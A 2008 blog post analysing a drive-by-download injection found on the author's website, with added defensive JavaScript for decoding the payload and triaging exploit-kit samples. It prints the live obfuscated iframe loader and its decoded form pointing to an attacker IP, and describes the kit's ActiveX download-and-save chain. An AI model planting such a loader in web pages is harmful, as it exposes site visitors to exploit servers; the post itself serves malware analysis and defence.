Forensics: Anatomy of a Drive-by-Download Attack
July 5th, 2008 — bjou

The other day I checked the source of a rarely used website of mine and found some suspicious code. It looked like a malicious iframe injection used for drive-by downloads, so I started investigating it. Be warned: I will NOT censor any of that code, so do NOT visit these websites unless you know what you are doing.
Now here is the obfuscated JavaScript code:
<!-- Nerzul --><script type="text/javascript">
document.write('\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0035\u0038\u002e\u0036\u0035\u002e\u0032\u0033\u0035\u002e\u0034\u0031\u002f\u006c\u006c\u006c\u006c\u002f\u0073\u0074\u0064\u0073\u002f\u0069\u006e\u0064\u0065\u0078\u002e\u0070\u0068\u0070\u003f\u0073\u0069\u0064\u003d\u0031\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0031\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0031\u0020\u0073\u0074\u0079\u006c\u0065\u003d\u0022\u0076\u0069\u0073\u0069\u0062\u0069\u006c\u0069\u0074\u0079\u003a\u0068\u0069\u0064\u0064\u0065\u006e\u003b\u0070\u006f\u0073\u0069\u0074\u0069\u006f\u006e\u003a\u0061\u0062\u0073\u006f\u006c\u0075\u0074\u0065\u0022\u003e\u003c\u002f\u0069\u0066\u0072\u0061\u006d\u0065\u003e');
</script>
which decodes to
<iframe src="http://58.65.235.41/llll/stds/index.php?sid=1" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>
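The safe way to get from the escaped blob to the iframe above is to decode the string statically rather than loading the page and letting document.write() run. The following is an added example, not code from the original post: it embeds the injected script quoted above as raw text, pulls the string literal out of the document.write() call, decodes the \uXXXX (and \xXX) escapes, and then flags any iframe that is 1x1 or styled invisible. The function names are my own; the only input is the script shown above.

```javascript
// Added example, not code from the original post: decode the \uXXXX-escaped
// document.write() payload statically, without ever running it in a browser.
// OBFUSCATED_SCRIPT is the injected script quoted above, embedded as raw text
// (String.raw keeps the backslashes literal, so the JS engine does not decode
// the escapes for us; the decoder below has to do it).
const OBFUSCATED_SCRIPT = String.raw`<!-- Nerzul --><script type="text/javascript">
document.write('\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0035\u0038\u002e\u0036\u0035\u002e\u0032\u0033\u0035\u002e\u0034\u0031\u002f\u006c\u006c\u006c\u006c\u002f\u0073\u0074\u0064\u0073\u002f\u0069\u006e\u0064\u0065\u0078\u002e\u0070\u0068\u0070\u003f\u0073\u0069\u0064\u003d\u0031\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0031\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0031\u0020\u0073\u0074\u0079\u006c\u0065\u003d\u0022\u0076\u0069\u0073\u0069\u0062\u0069\u006c\u0069\u0074\u0079\u003a\u0068\u0069\u0064\u0064\u0065\u006e\u003b\u0070\u006f\u0073\u0069\u0074\u0069\u006f\u006e\u003a\u0061\u0062\u0073\u006f\u006c\u0075\u0074\u0065\u0022\u003e\u003c\u002f\u0069\u0066\u0072\u0061\u006d\u0065\u003e');
</script>`;

// Pull out every string literal passed to document.write(...). Handles either
// quote style and backslash-escaped characters inside the literal.
function extractDocumentWriteLiterals(script) {
  const re = /document\.write\(\s*(['"])((?:\\.|(?!\1)[^\\])*)\1\s*\)/g;
  const literals = [];
  let m;
  while ((m = re.exec(script)) !== null) literals.push(m[2]);
  return literals;
}

// Decode JavaScript \uXXXX, \xXX and the common single-character escapes.
// Anything unrecognised is left as-is rather than dropped.
function decodeJsEscapes(s) {
  const simple = { n: "\n", r: "\r", t: "\t", "'": "'", '"': '"', "\\": "\\", "/": "/" };
  return s.replace(/\\u([0-9a-fA-F]{4})|\\x([0-9a-fA-F]{2})|\\(.)/g, (whole, u, x, c) => {
    if (u !== undefined) return String.fromCharCode(parseInt(u, 16));
    if (x !== undefined) return String.fromCharCode(parseInt(x, 16));
    return c in simple ? simple[c] : whole;
  });
}

// Report <iframe> tags that are sized or styled to be invisible, the hallmark
// of this kind of injection: 1x1 pixels and/or visibility:hidden or
// display:none in the inline style.
function findHiddenIframes(html) {
  const hits = [];
  const tagRe = /<iframe\b([^>]*)>/gi;
  let m;
  while ((m = tagRe.exec(html)) !== null) {
    const attrs = m[1];
    const attr = (name) => {
      const r = new RegExp("\\b" + name + "\\s*=\\s*(?:\"([^\"]*)\"|'([^']*)'|([^\\s>]+))", "i").exec(attrs);
      if (!r) return null;
      return r[1] !== undefined ? r[1] : r[2] !== undefined ? r[2] : r[3];
    };
    const width = attr("width");
    const height = attr("height");
    const style = (attr("style") || "").toLowerCase();
    const tiny = width !== null && height !== null && Number(width) <= 1 && Number(height) <= 1;
    const hiddenStyle = /visibility\s*:\s*hidden|display\s*:\s*none/.test(style);
    if (tiny || hiddenStyle) hits.push({ src: attr("src"), width, height, hidden: hiddenStyle });
  }
  return hits;
}

// Full pass: decode every document.write() argument and scan the result.
function analyzeInjectedScript(script) {
  const decoded = extractDocumentWriteLiterals(script).map(decodeJsEscapes);
  return { decoded, hiddenIframes: decoded.flatMap(findHiddenIframes) };
}

const report = analyzeInjectedScript(OBFUSCATED_SCRIPT);
console.log(report.decoded[0]);
console.log(report.hiddenIframes);
```

Running this with Node prints the decoded iframe tag exactly as shown above and one hit with src http://58.65.235.41/llll/stds/index.php?sid=1. Nothing in the payload is evaluated, so the same pass can be run over every page of a site to find other injected copies.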
Just to be on the safe side, I used a virtual machine, Sandbox Technologies and Wireshark to visit the website and capture the packets. After the HTTP GET request for that site, a “GET /llll/stds/go.php?sid=1 HTTP/1.1\r\n” followed, which redirected to “GET /llll/ts/index.php HTTP/1.1\r\n“. This request was repeated every 24 seconds. Following every single request, I got a lot of “Continuation or non-HTTP traffic” (Wireshark's label for TCP segments on port 80 whose payload does not start with an HTTP request or status line, typically the continuation of a large response body), meaning there were packets on port 80 without an HTTP header. There was a lot of HTTP data like “Data: 783932494B4148407542324C4E414833563358417A46484D…“, so I decided to use chaosreader to get a better understanding.
I got this interesting result. In total I got a lot of this obviously heavily obfuscated data, but the samples did not seem to differ much. I de-obfuscated them using Malzilla and ran diff on some of them:
[~/malicious]$diff exploit1 exploit2
177c177
< var fname="winSnp6O4.exe";
---
> var fname="winbtHWMzX7lmTK.exe";
[02:24:01] [~/malicious]$diff exploit2 exploit3
177c177
< var fname="winbtHWMzX7lmTK.exe";
---
> var fname="winIZdWt3zQl5YEQb.exe";
[02:24:06] [~/malicious]$diff exploit3 exploit4
177c177
< var fname="winIZdWt3zQl5YEQb.exe";
---
> var fname="winK6S9dnplSskzh.exe";
So we see that only the filename changes between samples. Moreover, when analyzing the de-obfuscated JS code, it can be seen that this file includes nine different exploit vectors, including Microsoft’s MDAC, Webview Folder Icon and DirectAnimation Heap Overflow vulnerabilities, Macromedia’s Flash vulnerability and some more that I did not investigate.
The script starts with attack(1);, which tries to create Shell.Application objects for several classids, then creates an ADODB.Stream and saves the responseBody received via XMLHTTP to a file whose name is the fixed prefix “win” followed by random characters (see above). While debugging the code on my system, creating the shell application object failed (its return value was null), so I was not able to open the stream and analyze that file.
However, after attack1 and attack2 failed (attack2 being the SWF exploit; its URL did not respond), the remaining exploits were run, but I did not go further into the analysis there…
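The diff above and the description of the payload suggest a quick static triage instead of repeated manual diffs. The following is an added example, not code from the original post: it takes de-obfuscated kit samples, extracts the dropper filename from var fname=..., the ActiveX/COM objects being instantiated, and the attack(N) entry call, checks for the XMLHTTP plus ADODB.Stream download-and-save chain the post describes, and tests whether a batch of samples differs only in the dropper name. The two samples are constructed for this example and contain only those indicator lines, not the exploit itself; the function and constant names are my own.

```javascript
// Added example, not code from the original post: static triage of
// de-obfuscated exploit-kit JavaScript. The samples below are constructed for
// this example and hold only the indicator lines the post describes.
const SAMPLES = {
  exploit1: [
    'var fname="winSnp6O4.exe";',
    'var sh = new ActiveXObject("Shell.Application");',
    'var xh = new ActiveXObject("Microsoft.XMLHTTP");',
    'var st = new ActiveXObject("ADODB.Stream");',
    'attack(1);',
  ].join("\n"),
  exploit2: [
    'var fname="winbtHWMzX7lmTK.exe";',
    'var sh = new ActiveXObject("Shell.Application");',
    'var xh = new ActiveXObject("Microsoft.XMLHTTP");',
    'var st = new ActiveXObject("ADODB.Stream");',
    'attack(1);',
  ].join("\n"),
};

const DROPPER_NAME = /\bvar\s+fname\s*=\s*["']([^"']+)["']/;
const ACTIVEX_PROGID = /new\s+ActiveXObject\(\s*["']([^"']+)["']\s*\)/g;
const ENTRY_CALL = /\battack\(\s*(\d+)\s*\)/;
// Kit-style dropper name as seen in the diffs: fixed "win" prefix, random
// alphanumerics, ".exe" suffix.
const KIT_DROPPER = /^win[A-Za-z0-9]+\.exe$/;

// Extract the indicators from one de-obfuscated sample.
function triage(js) {
  const nameMatch = DROPPER_NAME.exec(js);
  const fname = nameMatch ? nameMatch[1] : null;
  const progids = Array.from(js.matchAll(ACTIVEX_PROGID), (m) => m[1]);
  const lower = progids.map((p) => p.toLowerCase());
  const entryMatch = ENTRY_CALL.exec(js);
  return {
    fname,
    kitStyleName: fname !== null && KIT_DROPPER.test(fname),
    progids,
    entry: entryMatch ? Number(entryMatch[1]) : null,
    // Download-and-save chain: a transport (XMLHTTP) plus a file writer
    // (ADODB.Stream) in the same script.
    downloadAndSave: lower.some((p) => p.includes("xmlhttp")) && lower.includes("adodb.stream"),
  };
}

// True when every sample is identical after masking the dropper filename,
// i.e. the only thing the server varies per request is that name.
function onlyDropperNameDiffers(samples) {
  const masked = Object.values(samples).map((js) => js.replace(DROPPER_NAME, 'var fname="<masked>"'));
  return masked.every((js) => js === masked[0]);
}

for (const [name, js] of Object.entries(SAMPLES)) console.log(name, triage(js));
console.log("only the dropper name differs:", onlyDropperNameDiffers(SAMPLES));
```

On the constructed samples this reports the two dropper names from the diffs, attack(1) as the entry point, three progids, and confirms that the samples differ only in the dropper name. Real kit output should be run through a de-obfuscator such as Malzilla first, as in the post; the regexes only work on plain-text JavaScript.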
So only one question remains: how did that code get into the index.html pages of my website? My FTP password is rather strong, so that can’t be it, and neither can social engineering or SQL injection, as the site was pure HTML without any DB backend. Waiting for an answer from my web hoster…